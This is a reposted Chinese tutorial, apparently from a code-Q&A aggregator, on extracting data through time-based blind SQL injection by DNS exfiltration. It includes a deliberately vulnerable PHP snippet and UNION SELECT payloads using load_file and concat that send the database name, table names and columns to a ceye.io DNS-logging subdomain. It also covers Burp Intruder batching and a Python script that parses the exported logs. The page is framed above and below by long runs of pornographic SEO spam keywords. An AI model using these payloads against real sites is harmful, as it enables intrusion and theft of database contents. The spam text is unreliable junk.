日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 编程资源 > 编程问答 >内容正文

编程问答

json里面的list数据取不出来_sql盲注的困局:利用DNSlog快速导出数据

發布時間:2025/3/15 编程问答 32 豆豆
生活随笔 收集整理的這篇文章主要介紹了 json里面的list数据取不出来_sql盲注的困局:利用DNSlog快速导出数据 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

對于一個sql注入點來說最幸運的就是支持堆疊注入,最蛋疼的就是盲注,盲注里面難搞的就是基于時間的盲注。

我們在本地利用這段代碼進行演示

<?php error_reporting(0); $link = mysqli_connect('localhost','root','root'); mysqli_set_charset($link,'utf8'); mysqli_select_db($link,'test'); $id = $_GET['id']; $sql = "select * from test.order where id=$id"; $res = mysqli_query($link,$sql);

把鏈接丟到sqlmap里面,可以看到sqlmap成功檢測出了時間盲注

在局域網網絡環境延遲很低,并且沒有任何安全軟件的前提下

sqlmap猜解表明的速度依然非常慢,接下來我們嘗試用dns log的方式來獲取數據。

dns猜解數據需要執行

show variables like '%secure%';

1、當secure_file_priv為空,就可以讀取磁盤的目錄。

2、當secure_file_priv為G:,就可以讀取G盤的文件。

3、當secure_file_priv為null,load_file就不能加載文件。

如果secure_file_priv不為空,可以通過設置my.ini來配置。加入secure_file_priv="",然后重啟mysql即可。

還需要一個dnslog的平臺,我一般用 http://ceye.io/

平臺會分配一個子域名

ping一下這個域名

然后即可看到剛才ping的記錄

然后我們測試一下注入點是否支持dns外帶數據。

通過

http://127.0.0.1/test.php?id=1 union select 1,2,3,4 and sleep(10)

猜解到字段數為4,然后測試是否支持dns外帶數據

http://127.0.0.1/test.php?id=1 union select 1,load_file('t1.xxxx.ceye.ioabc'),3,4

可以看到t1的被帶了出來

下面進行數據拆解

查數據庫名

http://127.0.0.1/test.php?id=1 union select 6,load_file(concat('',(select database()),'.xxx.ceye.ioabc')),3,8

數據庫名為test

然后拆解第一個表名

http://127.0.0.1/test.php?id=1 union select 1,load_file( concat('',(select table_name from information_schema.tables where table_schema=0x74657374 limit 0,1),'.xxxx.ceye.ioabc')),3,4

第一個表名為admin

然后我們通過burp來進行批量拆解,先查表的數量

http://127.0.0.1/test.php?id=1 union select 1,load_file( concat('',(select count(table_name) from information_schema.tables where table_schema=0x74657374 limit 0,1),'.xxx.ceye.ioabc')),3,4

一共有四張表

然后批量獲取表名

127.0.0.1/test.php?id=1 union select 1,load_file( concat('',(select table_name from information_schema.tables where table_schema=0x74657374 limit 0,1),'.xxxx.ceye.ioabc')),3,

發送URL到burp的測試器

limit 0,1 后面的0設置為變量

payload選擇

線程設置為 1

然后開始攻擊

完成以后

可以在平臺上查到獲取到的表名

平臺提供文件導出為json文件的功能

下載到本地,放到腳本目錄

#python3 import json#自己平臺的地址 url = '.xxx.ceye.io'f = open('./data.json') json_data = f.read() f.close()data = json.loads(json_data)data_list = []for i in data:data_list.append(i['name'].replace(url,''))data_list = list(set(data_list)) for i in data_list:print(i)

可以去重以后打印出剛才獲取的數據

清理歷史記錄

再通過burp獲取admin表的字段

http://127.0.0.1/test.php?id=1 union select 1,load_file( concat('',(select column_name from information_schema.columns where table_name=0x61646D696E limit 0,1),'.xxxx.ceye.ioabc')),3,4

獲取數據

select column_name from information_schema.columns where table_name=0x61646D696E limit 0,1

總結

以上是生活随笔為你收集整理的json里面的list数据取不出来_sql盲注的困局:利用DNSlog快速导出数据的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。

主站蜘蛛池模板: 亚洲精品小说 | 成人午夜视频在线免费观看 | 日韩美女少妇 | 艳妇臀荡乳欲伦交换h漫 | 欧美日韩成人在线观看 | 精品欧美一区二区三区久久久 | 亚洲三级影视 | 高跟鞋av | 女仆乖h调教跪趴1v1 | 国产麻豆乱码精品一区二区三区 | 一级黄色a级片 | 免费av不卡在线观看 | 黄色高清网站 | 极品粉嫩国产18尤物 | www.白浆| 九九热只有精品 | 人成免费在线视频 | 欧美不卡网| 亚洲精品.www | 亚洲区小说区图片区qvod | 中文字幕一区二区在线观看视频 | 色日韩| 污视频网站在线 | 色哟哟一区二区 | 桃色av网站| 大香伊人久久 | 国产98色在线 | 日韩 | 免费性片| 香蕉视频性 | 91精品国产一区二区三区 | 中文字幕乱视频 | www.香蕉视频在线观看 | 波多野结衣视频免费观看 | 亚洲乱码久久 | 久久国| 91午夜视频在线观看 | 黄色激情毛片 | 欧美一级二级在线观看 | 一区二区精品国产 | 色屁屁一区二区 | 日韩av电影网址 | 河北彩花av在线播放 | 成人xx视频 | 2021天天操 | 岛国大片在线 | 毛片毛片毛片毛片毛片毛片毛片毛片 | 窝窝午夜视频 | 日本东京热一区二区三区 | 天天干夜夜做 | 亚洲97视频| 亚洲欧美第一视频 | 在线免费观看视频 | 国产精品亚洲自拍 | 中日韩在线视频 | av嫩草| 久91 | 成人性生交大片免费看 | 用力使劲高潮了888av | 国产精品九色 | 成人app在线 | 亚洲一区欧美日韩 | 久久成人小视频 | 国产乡下妇女做爰毛片 | 久久99精品久久久久久 | 国产伦精品一区二区三区视频黑人 | 老司机一区二区三区 | 神秘马戏团在线观看免费高清中文 | 国产成人一区二区 | 国产一区二区三区在线观看免费 | 2020国产在线 | 国产精品一色哟哟哟 | 性欧美精品中出 | 日日摸天天添天天添破 | 亚洲精品中文字幕乱码三区91 | 日韩在线高清视频 | 亚洲xxxx天美 | 激情戏网站 | 无码精品人妻一区二区 | 性av免费| 综合99 | 欧美一性一乱一交一视频 | 欧美亚洲精品天堂 | 亚洲女人被黑人巨大进入 | 国产精品一区二区白浆 | 国产第5页| 国产剧情在线 | 中文字幕乱码中文乱码777 | 少妇又色又紧又大爽又刺激 | 91毛片网站 | 91国产一区二区 | 美妇湿透娇羞紧窄迎合 | 日韩av免费网站 | 最新中文字幕在线观看 | 人妻少妇一区二区三区 | 久久在线 | 熟妇人妻系列aⅴ无码专区友真希 | 精品国偷自产一区二区三区 | 中文字幕一区二区三区人妻 | 日本九九视频 |